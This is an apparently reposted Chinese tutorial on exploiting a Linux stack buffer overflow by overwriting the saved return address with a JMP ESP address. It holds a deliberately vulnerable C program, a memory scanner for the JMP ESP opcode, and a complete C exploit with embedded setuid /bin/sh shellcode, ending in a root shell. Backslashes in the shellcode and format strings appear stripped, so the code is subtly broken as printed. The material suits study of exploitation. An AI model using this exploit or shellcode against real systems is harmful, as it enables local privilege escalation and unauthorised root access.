利用JMPESP执行shellcode

利用JMPESP执行shellcode

1. 前言.
Linux下面Buffer overflow中利用跳转到堆栈中的shellcode用的比较多, windows下面利用JMP ESP跳转的比较多, 本文没有什么技术新意,不过是突发奇想, 改变一下我自己以往的方法而已.
2. 比较.
经常使用的跳转到堆栈的shellcode方法有很好的一面, 比如可以把shellcode放到ENV里面, 这样可以逃避长度的限制. 缺点是这个计算麻烦,增大NOP是个不错的选择. Jmp esp也是个不错的选择哦, 这样可以不用知道shellcode的具体位置了.
3. 看看怎么回事吧.
有问题的程序:
[netconf@linux1 test]$ cat vul.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int foo(char *s1)
{
char buffer[20];
memset(buffer,0,20);
strcpy(buffer,s1);
printf("input:%srn",buffer);
return 0;
}

main(int argc,char **argv)
{

if(argc<2)
{
printf("Usage:%s <string>n",argv[0]);
exit(0);
}
foo(argv[1]);
exit(0);
}
很普通的一个buffer overflow.
堆栈结构如下所示:
|AAAA…………….A| 其他内容 | ebp | eip |
溢出后, 一般是这样的:
|AAAAAA………...A…….AAAAAAAA|shellcode地址|
利用shellcode地址替换掉保存的eip值
利用jmp esp的堆栈结构:
|AAAAAAAAAAAAAAAAAAAAAA|jmp esp addr|shellcode
用jmp esp addr来覆盖eip,这样当程序执行eip的时候, 会执行jmp esp指令, 这个时候esp已经是我们存放shellcode的地址了, 这样的精确性就大大提高了,而且不用多余的NOP来覆盖.
首先, 我们需要一个地址,这个地址的内容的汇编代码应该是jmp esp , 我们需要写一个小程序来获得我们所需要的地址:
[netconf@linux1 test]$ cat findesp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
unsigned int i=0x4211cc79;
unsigned int a=0;
unsigned char *p;
void de(int j)
{
printf("rnGot SIGSEGV:");
printf("%prn",p+a);
a++;
exit(0);
}
main()
{
p=(unsigned char *)i;
signal(SIGSEGV,de);
foo();
}
int foo()
{
while((unsigned int)p+a<0xbfffffff)
{
fflush(stdout);
if((*(p+a)==0xff) && (*(p+a+1)==0xe4))
{
printf("found it!!,p addr:%pn",p+a);
a+=2;
foo();
}
a++;
}
exit(0);
}
运行一下:
[netconf@linux1 test]$ ./findesp
found it!!,p addr:0x4211ccf7
found it!!,p addr:0x4211dd5b
found it!!,p addr:0x4211dee7
found it!!,p addr:0x4211e15f
found it!!,p addr:0x4211e59f
found it!!,p addr:0x42125aa3
found it!!,p addr:0x42125c13

Got SIGSEGV:0x4212f000
[netconf@linux1 test]$
不错吧, 得到了很多个满足条件的地址, 我们随便选一个, 只要不带0x00就好.
这样我们可以写出这样一个exploit:
[netconf@linux1 test]$ cat exp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <error.h>

#define JMPESP 0x42125aa3

char progname[]="./vul";
char shellcode[]=
"x31xdbx31xc9x31xd2x31xc0xb0xa4xcdx80"
"x89xd8xb0x17xcdx80"
"x31xc0x50x50xb0xb5xcdx80"
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/bin/sh";

main(int argc,char **argv)
{
char buffer[1024];
int num=44,i=0;

memset(buffer,0,1024);
memset(buffer,'A',num);
buffer[num++]=JMPESP & 0xff;
buffer[num++]=(JMPESP>>8) & 0xff;
buffer[num++]=(JMPESP>>16) & 0xff;
buffer[num++]=(JMPESP>>24) & 0xff;
memcpy(buffer+num,shellcode,sizeof(shellcode));
execl(progname,progname,buffer,NULL);
}
是不是很短的程序?
[netconf@linux1 test]$ ./exp
……………………
. 蛝1蹓谸蛝柢/bin/sh
sh-2.05b#
轻松搞定.

最后

以上就是无情小土豆为你收集整理的利用JMPESP执行shellcode的全部内容，希望文章能够帮你解决利用JMPESP执行shellcode所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。